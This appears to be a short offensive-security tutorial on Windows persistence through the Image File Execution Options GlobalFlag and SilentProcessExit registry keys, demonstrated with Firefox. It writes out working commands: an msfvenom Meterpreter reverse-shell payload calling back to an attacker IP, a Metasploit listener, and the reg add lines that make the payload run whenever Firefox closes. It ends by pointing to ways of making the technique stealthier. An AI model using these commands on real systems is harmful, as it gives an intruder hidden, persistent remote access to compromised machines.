Introduction
According to the MITRE ATT&CK Framework, once an attacker has gained initial access and escalated privileges, the process of persistence begins. The persistence technique (ATT&CK TA0003) involves mechanisms, procedures, or techniques to maintain continuous access to the compromised system.
A highly intriguing technique that can be employed at this stage of exploitation involves the manipulation of the Windows registry key named "Image File Execution Options." This key enables developers to link a debugger to a specific application, thereby triggering the activation of the "GlobalFlag" for application debugging.
This functionality opens up opportunities for persistence scenarios, as an arbitrary executable file can be designated as a debugger for a specific process, triggered when the application is terminated. However, it's important to note that implementing this technique requires administrator privileges, as the registry key is located in HKEY_LOCAL_MACHINE.
GlobalFlag
The implementation of this technique involves creating three registry keys and inserting arbitrary payload that will execute on a specific event. In this case, the chosen event is the closing of Firefox.
For this demonstration, I will use msfvenom to create the reverse shell payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.134 LPORT=1207 -f exe > kirito.exe
To receive the connection, we will use the Metasploit multi-handler module:
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.88.134; set LPORT 1207"
With privileged shell access, we will create the following registry keys to implement the persistence technique:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe" /v GlobalFlag /t REG_DWORD /d 512 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\firefox.exe" /v ReportingMode /t REG_DWORD /d 1 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\firefox.exe" /v MonitorProcess /d "C:\Windows\tasks\kirito.exe"
When observing the Registry Editor, you will notice that the value for Firefox within "Image File Execution Options" is set to 0x200.
As per Microsoft's documentation, the value 0x200 indicates that the Global Flag is enabled.
Note that Firefox is also listed under the "SilentProcessExit" key.
When the Firefox process is terminated, the payload is executed, and communication is established with the attacker.
The closing of Firefox results in the creation of a new process named "WerFault.exe," used to track errors related to the operating system and Windows resources. The payload is executed as a child process of "WerFault.exe."
Conclusion
"Silent process exit" is just one of the many available persistence techniques. This technique can be further refined to achieve greater stealth within the compromised environment.